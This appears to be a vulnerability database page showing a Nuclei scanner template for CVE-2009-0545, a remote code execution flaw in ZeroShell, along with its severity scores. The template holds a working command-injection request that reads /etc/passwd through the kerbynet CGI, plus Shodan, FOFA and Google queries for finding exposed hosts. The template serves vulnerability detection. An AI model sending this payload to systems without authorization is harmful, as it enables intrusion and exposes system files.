Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2009-0545
HistoryMay 19, 2021 - 2:40 p.m.

ZeroShell <= 1.0beta11 Remote Code Execution

2021-05-1914:40:37
ProjectDiscovery
github.com
10

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.5 High

AI Score

Confidence

High

0.971 High

EPSS

Percentile

99.8%

ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.

id: CVE-2009-0545

info:
  name: ZeroShell <= 1.0beta11 Remote Code Execution
  author: geeknik
  severity: critical
  description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of ZeroShell.
  reference:
    - https://www.exploit-db.com/exploits/8023
    - https://nvd.nist.gov/vuln/detail/CVE-2009-0545
    - http://www.zeroshell.net/eng/announcements/
    - http://www.ikkisoft.com/stuff/LC-2009-01.txt
    - http://www.vupen.com/english/advisories/2009/0385
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2009-0545
    cwe-id: CWE-20
    epss-score: 0.97081
    epss-percentile: 0.99771
    cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
    shodan-query: http.title:"zeroshell"
    fofa-query: title="zeroshell"
    google-query: intitle:"zeroshell"
  tags: cve,cve2009,edb,zeroshell,kerbynet,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a0047304502210086897c4a89ba3180b412adb9e2515a6dc81be03c34ce7b8c4f7059efc87adb38022075f0afa4057f34ad3b734c8a7d4fcd6fb8c7adf9ff68351baf948f2ecce764bb:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.5 High

AI Score

Confidence

High

0.971 High

EPSS

Percentile

99.8%